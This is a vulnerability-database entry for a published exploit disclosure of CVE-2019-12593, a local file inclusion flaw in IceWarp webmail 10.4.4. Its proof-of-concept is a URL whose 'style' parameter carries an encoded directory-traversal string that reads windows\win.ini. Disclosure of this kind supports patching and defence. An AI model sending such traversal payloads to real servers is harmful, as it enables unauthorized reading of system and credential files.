Lucene search
Jameel NabboPACKETSTORM:153161HistoryJun 04, 2019 - 12:00 a.m.
IceWarp 10.4.4 Local File Inclusion
2019-06-0400:00:00
Jameel Nabbo
packetstormsecurity.com
109
0.111 Low
EPSS
Percentile
95.2%
`# Exploit Title: IceWarp <=10.4.4 local file include
# Date: 02/06/2019
# Exploit Author: JameelNabbo
# Website: uitsec.com
# Vendor Homepage: http://www.icewarp.com
# Software Link: https://www.icewarp.com/downloads/trial/
# Version: 10.4.4
# Tested on: Windows 10
# CVE: CVE-2019-12593
POC:
http://example.com/webmail/calendar/minimizer/index.php?style=[LFI]
Example:
http://example.com/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
`
Related
exploitpack
exploitpack
IceWarp 10.4.4 - Local File Inclusion
2019-06-04 00:00:00
cvelist
cvelist
CVE-2019-12593
2019-06-03 16:41:07
nvd
nvd
CVE-2019-12593
2019-06-03 17:29:01
zdt
zdt
IceWarp 10.4.4 - Local File Inclusion Vulnerability
2019-06-05 00:00:00
prion
prion
Directory traversal
2019-06-03 17:29:00
nuclei
nuclei
IceWarp Mail Server <=10.4.4 - Local File Inclusion
2020-09-05 06:49:58
cve
cve
CVE-2019-12593
2019-06-03 17:29:01
exploitdb
exploitdb
IceWarp 10.4.4 - Local File Inclusion
2019-06-04 00:00:00